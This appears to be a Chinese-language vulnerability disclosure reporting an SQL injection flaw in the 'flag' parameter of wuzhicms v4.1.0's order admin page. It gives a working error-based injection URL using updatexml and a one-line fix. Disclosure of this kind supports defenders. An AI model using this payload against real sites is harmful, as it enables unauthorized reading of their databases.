wuzhicms v4.1.0 /coreframe/app/order/admin/index.php sql注入漏洞

我在 /coreframe/app/order/admin/index.php 中发现了一个 sql 注入漏洞

图片[1]-wuzhicms v4.1.0 /coreframe/app/order/admin/index.php sql注入漏洞-孤勇者社区

参数'flag'没有过滤有害输入,所以我可以注入sql
像这样的有效负载:

http://127.0.0.1/index.php?m=order&f=index&v=listing&_su=wuzhicms&flag= xxxx' or updatexml(1,concat(0x7e,(version())),0) or '

图片[2]-wuzhicms v4.1.0 /coreframe/app/order/admin/index.php sql注入漏洞-孤勇者社区

图片[3]-wuzhicms v4.1.0 /coreframe/app/order/admin/index.php sql注入漏洞-孤勇者社区

建议:

$flag = sql_replace($GLOBALS['flag']);
------本页内容已结束,喜欢请分享------

感谢您的来访,获取更多精彩文章请收藏本站。

© 版权声明
THE END
喜欢就支持一下吧
点赞15赞赏 分享
评论 共1条
头像
欢迎您留下宝贵的见解!
提交
头像

昵称

取消
昵称表情代码图片
    • 头像的魔0